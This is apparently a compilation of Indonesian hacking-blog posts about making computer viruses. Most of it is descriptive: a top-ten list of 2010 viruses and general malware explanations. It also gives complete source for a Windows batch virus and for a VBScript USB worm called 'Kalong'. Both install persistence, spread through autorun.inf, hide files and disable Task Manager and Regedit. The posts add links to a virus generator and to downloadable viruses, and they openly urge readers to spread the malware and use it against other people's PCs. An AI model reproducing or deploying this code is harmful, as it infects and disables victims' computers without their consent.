Virus Modifikasi!!

wew...kalo denger title diatas mgkn kk2 kira ne nama virus nya,,eit itu artinya virus nya bisa di modifikasi sendiri kk..hahahahah

tanpa banyak bacot,langsung lanjut ke tutorial...

ne virus hanya bekerja di windows XP,soalnya gw edit ne pake XP gan,ga coba di OS lain...vir ini ga terlalu berbahaya juga..ntar juga tau deh..
n ini bukan virus pertamax,gw cuma dapat pencerahan dari seseorang dan belajar2 n edit...

1. buka notepad
2.massukin

@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\C urrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f


3.save dengan extensi .bat
4.bikin autorun.inf dengan script...


[autorun]<br />open=nama_file.bat

5.save dengan extensi .inf
6.file2 tsb harus dalam 1 direktori
7.hidden n read-only the files
8.copy n bagikan,sebarkan,wkwkwkwkwk
9.sampai jumpa...

sumber: IH member לוסאַפער

G2vg Virus generator..

fitur G2 virus generator

* Mudah update melalui file data.
* Menerima MPC-compliant file konfigurasi.
* Virus yang berbeda dapat dihasilkan dari file konfigurasi yang identik.
* Ukuran executable kecil, memungkinkan untuk kecepatan dan beban selama eksekusi.
* Masih tidak ada IDE - mengedit file konfigurasi dalam editor favorit anda dan cepat menghasilkan kode baru; tidak perlu menunggu lama untuk sementara IDE beban, sehingga Anda dapat bekerja lebih cepat dan hasil lebih cepat. Sebuah produktivitas yang pasti bonus!
* Rapid generasi kode, sekali lagi memungkinkan untuk hasil cepat.
* Rendah persyaratan memori.

Sebagai alat bantu pembuat virus, ini memiliki beberapa fitur berikut:

* Menghasilkan kompak, mudah dimodifikasi, sepenuhnya berkomentar, kode sumber.
* COM / EXE infectors.
* Residen dan nonresident virus.
* Mendukung berbagai macam, semi-rutin enkripsi polimorfik (polimorfisme penuh coming soon).
* Mudah ditingkatkan bila perbaikan yang diperlukan.

http://area13.wap.sh/_G2V.Generator_

Virus paling berbahaya di tahun 2010

ini Virus Komputer Paling Berbahaya Tahun 2010

Serangan virus jenis VBScript masih sangat tinggi, ini terbukti dari banyaknya laporan yang mengeluhkan perihal virus jenis script ini. Satu virus yang melesat tinggi ke urutan pertama adalah Discusx.vbs. Bila Anda masih ingat dengan virus ini, di Virus Top-10 edisi Maret 2008 yang lalu, virus Discusx.vbs berada di urutan 5, namun kali ini dia melesat naik ke urutan pertama. Berikut daftar selengkapnya:

1. Discusx.vbs
Virus VBScript yang satu ini, memiliki ukuran sekitar 4.800 bytes. Dia akan mencoba menginfeksi di beberapa drive di komputer Anda, termasuk drive flash disk, yang jika terinfeksi akan membuat file autorun.inf dan System32.sys.vbs pada root drive tersebut. Selain itu, ia pun akan mengubah caption dari Internet Explorer menjadi “.:iscus-X SAY MET LEBARAN! [HAPPY LEBARAN ?!]::.”.

2. Reva.vbs
Lagi, virus jenis VBScript yang lumayan banyak dikeluhkan oleh beberapa pembaca. Ia akan mencoba menyebarkan dirinya ke setiap drive di komputer Anda termasuk drive flash disk. Pada drive terinfeksi akan terdapat file reva.vbs, autorun.inf, dan shaheedan.jpg. Selain itu, ia pun akan mengubah halaman default dari Internet Explorer agar mengarah ke situs lain

3. XFly
PC Media Antivirus mengenali dua varian dari virus ini, yakni XFly.A dan XFly.B. Sama seperti kebanyakan virus lokal lainnya, ia dibuat menggunakan Visual Basic. Memiliki ukuran tubuh sebesar 143.360 bytes tanpa di-compress. Dan ia dapat menyamar sebagai folder, file MP3 WinAmp atau yang lainnya dengan cara mengubah secara langsung resource icon yang ada pada tubuhnya. Ini akan lebih mempersulit user awam dalam mengenalinya. Pada komputer terinfeksi, saat menjalankan Internet Explorer, caption-nya akan berubah menjadi “..:: x-fly ::..”, dan saat memulai Windows pun akan muncul pesan dari si pembuat virus pada default browser. Atau setiap waktu menunjukan pukul 12:30, 16:00, atau 20:00, virus ini pun akan menampilkan layar hitam yang juga berisi pesan dari si pembuat virus.

4. Explorea
Virus yang di-compile menggunakan Visual Basic ini hadir dengan ukuran sekitar 167.936 bytes, tanpa di-compress. Menggunakan icon mirip folder standar Windows untuk mengelabui korbannya. Virus ini akan menyerang Registry Windows Anda dengan mengubah default open dari beberapa extension seperti .LNK, .PIF, .BAT, dan .COM. Pada komputer terinfeksi, disaat-saat tertentu terkadang muncul pesan error, contohnya pada saat membuka System Properties.

5. Gen.FFE
Gen.FFE atau pembuatnya menamakan Fast Firus Engine merupakan salah satu program Virus Generator buatan lokal. Dengan hanya menggunakan program ini, tidak dibutuhkan waktu lama untuk dapat menciptakan virus/varian baru. Virus hasil keluaran program ini menggunakan icon mirip gambar folder standar bawaan Windows. Ia pun akan memblokir akses ke Task Manager, Command Prompt, serta menghilangkan beberapa menu di Start Menu. Ia juga akan membaca caption dari program yang aktif, apabila terdapat string yang berhubungan dengan antivirus maka program tersebut akan segera ditutup olehnya.

6. Hampa
Virus yang juga dibuat menggunakan Visual Basic dan ber-icon-kan folder ini memiliki ukuran tubuh sekitar 110.592 bytes, tanpa di-compress. Banyak sekali perubahan yang ia buat pada Windows, seperti Registry, File System, dan lain sebagainya, yang bahkan dapat menyebabkan Windows tidak dapat digunakan sebagaimana mestinya. Pada komputer yang terinfeksi oleh virus ini, saat memulai Windows akan muncul pesan dari si pembuat virus.

7. Raider.vbs
Virus jenis VBScript ini berukuran sekitar 10.000 bytes, jika file virus dibuka dengan Notepad misalnya, maka tidak banyak string yang bisa dibaca karena dalam kondisi ter-enkripsi. Pada Registry, ia pun memberikan pengenal dengan membuat key baru di HKLM\Software dengan nama sama seperti nama pada computer name, dengan isinya berupa string value seperti nama virus tersebut, Raider, serta tanggal komputer tersebut kali pertama terinfeksi.

8. ForrisWaitme
Virus yang dibuat dengan Visual Basic ini menggunakan icon mirip folder standar Windows untuk melakukan penyamarannya. Beberapa ulahnya adalah menukar fungsi tombol mouse kiri dengan kanan, menghilangkan menu Folder Options, membuat file pesan “baca saya.txt” pada drive terinfeksi, dan masih ada yang lainnya.

9. Pray
Virus lokal ini dibuat menggunakan Visual Basic. Kami mendapati 2 varian dari virus ini, untuk varian Pray.A tidak memiliki icon, sementara untuk varian Pray.B menggunakan icon mirip Windows Explorer. Jika komputer terinfeksi oleh virus ini, saat penunjuk waktu di komputer tersebut menunjukan pukul 05:15, 13:00, 16:00, 18:30, dan atau 19:45, virus ini akan menampilkan pesan yang mengingatkan user untuk melakukan shalat.

10. Rian.vbs
Virus VBScript ini memiliki ukuran 3788 bytes. Saat menginfeksi, ia akan menciptakan file baru autorun.inf dan RiaN.dll.vbs pada setiap root drive yang terpasang di komputer korban, termasuk Flash Disk. Komputer yang terinfeksi oleh virus ini, caption dari Internet Explorer akan berubah menjadi “Rian P2 Humas Cantiq

sumber:
forumkami.com

bikin Virus pakai notepad

ini tutorial pertama saye bikin virus pake notepad..ini tutorial gw copas dari binushacker.net^^
gw say thanks ne ma orang nya..thanks yow binushacker^^
gini...
Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :
‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next
‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘//–Manipulasi Registry–//
set kalong = createobject(”WScript.Shell”)
‘//–Manip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “
‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”
‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”
‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “
‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”
‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode
Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja..

Area-13 wapsite/Virus Download!!!

if ur wanna download virus...

the wapsite of area-13 has release...visit him at

http://area13.wap.sh

now this wap able to download a mobile phone virus n tutorial... :)


note:packet virus???
I just want to say dont use it to your p.c!!!
but use it to ur opponent p.c!!!
this is the link download...

http://www.mediafire.com/?9nyjx1sll9d

Malicious Programs Descriptions

Malicious programs can be divided into the following groups: worms, viruses, Trojans, hacker utilities and other malware. All of these are designed
to damage the infected machine or other networked machines.

Network Worms

This category includes programs that propagate via LANs or the Internet with the following objectives:

* Penetrating remote machines
* Launching copies on victim machines
* Spreading further to new machines


Worms use different networking systems to propagate: email, instant messaging, file-sharing (P2P), IRC channels, LANs, WANs and so forth.

Most existing worms spread as files in one form or another - email attachments, in ICQ or IRC messages, links to files stored on infected websites or FTP servers, files accessible via P2P networks and so on.

There are a small number of so-called fileless or packet worms; these spread as network packets and directly penetrate the RAM of the victim machine, where the code is then executed.

Worms use a variety of methods for penetrating victim machines and subsequently executing code, including:

* Social engineering; emails that encourage recipients to open the attachment
* Poorly configured networks; networks that leave local machines open to access from outside the network
* Vulnerabilities in operating systems and applications


Today's malware is often a composite creation: worms now often include Trojan functions or are able to infect exe files on the victim machine. They are no longer pure worms, but blended threats.

Classic Viruses

This class of malicious programs covers programs that spread copies of themselves throughout a single machine in order to:

* Launch and/or execute this code once a user fulfills a designated action
* Penetrate other resources within the victim machine


Unlike worms, viruses do not use network resources to penetrate other machines. Copies of viruses can penetrate other machines only if an infected object is accessed and the code is launched by a user on an
uninfected machine. This can happen in the following ways:

* The virus infects files on a network resource that other users can access
* The virus infects removable storage media which are then attached to a clean machine
* The user attaches an infected file to an email and sends it to a 'healthy' recipient


Viruses are sometimes carried by worms as additional payloads or they can themselves include backdoor or Trojan functionality which destroy data on an infected machine

Trojan Programs

This class of malware includes a wide variety of programs that perform actions without the user's knowledge or consent: collecting data and sending it to a cyber criminal, destroying or altering data
with malicious intent, causing the computer to malfunction, or using a
machine's capabilities for malicious or criminal purposes, such as
sending spam.

A subset of Trojans damage remote machines or networks without compromising infected machines; these are Trojans that utilize victim machines to participate in a DoS attack on a designated web site.

Hacker Utilities and other malicious programs

This diverse class includes:

* Utilities such as constructors that can be used to create viruses, worms and Trojans
* Program libraries specially developed to be used in creating malware
* Hacker utilities that encrypt infected files to hide them from antivirus software
* Jokes that interfere with normal computer function
* Programs that deliberately misinform users about their actions in the system
* Other programs that are designed to directly or indirectly damage local or networked machines

Whats is Virus???

komputer, virus adalah program atau kode yang mereplikasi pemrograman dengan tidak dapat disalin atau memulai dengan mengkopi program lain, sektor boot komputer atau dokumen. Virus dapat ditularkan sebagai lampiran ke e-mail dalam sebuah catatan atau file yang didownload, atau hadir pada disket atau CD. Sumber langsung dari e-mail catatan, file yang didownload, atau disket Anda telah menerima biasanya tidak menyadari bahwa itu mengandung virus. Beberapa virus menimbulkan efek mereka segera setelah kode mereka dijalankan; virus lainnya tertidur sampai keadaan menyebabkan kode mereka akan dijalankan oleh komputer. Beberapa virus jinak atau main-main di maksud dan efek ( "Happy Birthday, Ludwig!") Dan beberapa dapat cukup berbahaya, menghapus data atau menyebabkan hard disk anda untuk memerlukan reformatting. Sebuah virus yang mereplikasi diri dengan kirim kembali dirinya sebagai lampiran e-mail atau sebagai bagian dari pesan jaringan dikenal sebagai cacing.

Secara umum, terdapat tiga kelas utama virus:

File infectors. Beberapa file infector virus melampirkan diri untuk file program, biasanya dipilih. COM atau. EXE file. Beberapa dapat menginfeksi program apapun yang eksekusi diminta, termasuk. SYS,. OVL,. PRG, dan. MNU file. Ketika program ini dibuka, virus ini dimuat juga. File lain tiba sebagai infector virus yang terkandung sepenuhnya program atau skrip dikirim sebagai lampiran ke e-mail catatan.

Sistem atau boot-catatan infectors. Virus ini menginfeksi kode dieksekusi ditemukan di daerah sistem tertentu di disk. Mereka melekat pada DOS boot sector pada disket atau Master Boot Record pada hard disk. Tipikal skenario (dikenal oleh penulis) adalah untuk menerima disket dari sumber yang tidak bersalah yang berisi boot disk virus. Ketika sistem operasi Anda berjalan, file pada disket dapat dibaca tanpa memicu virus boot disk. Namun, jika anda meninggalkan disket di drive, kemudian menghidupkan komputer atau reload dari sistem operasi, komputer akan tampak pertama kali di drive A Anda, menemukan disket boot disk dengan virus, beban itu, dan membuatnya tidak mungkin untuk sementara untuk menggunakan hard disk. (Biarkan beberapa hari untuk pemulihan.) Inilah sebabnya mengapa Anda harus memastikan bahwa Anda memiliki disket bootable.

Macro virus. Ini adalah salah satu virus yang paling umum, dan mereka cenderung untuk melakukan hal yang paling merusak. Macro virus menginfeksi aplikasi Microsoft Word Anda dan biasanya memasukkan kata-kata atau frasa yang tidak diinginkan.

Perlindungan terbaik terhadap virus adalah untuk mengetahui asal-usul setiap program atau file yang Anda load ke dalam komputer Anda atau membuka dari program e-mail. Karena ini adalah sulit, Anda dapat membeli software anti-virus yang dapat layar lampiran e-mail dan juga mengecek semua file Anda secara berkala dan menghapus virus yang ditemukan. Dari waktu ke waktu, Anda mungkin mendapatkan e-mail peringatan tentang virus baru. Kecuali peringatan adalah dari sumber Anda mengenali, kemungkinan besar bahwa peringatan adalah virus tipuan.

Virus komputer, tentu saja, mendapatkan namanya dari virus biologis. Kata itu sendiri berasal dari bahasa Latin yang berarti berlendir cair atau racun.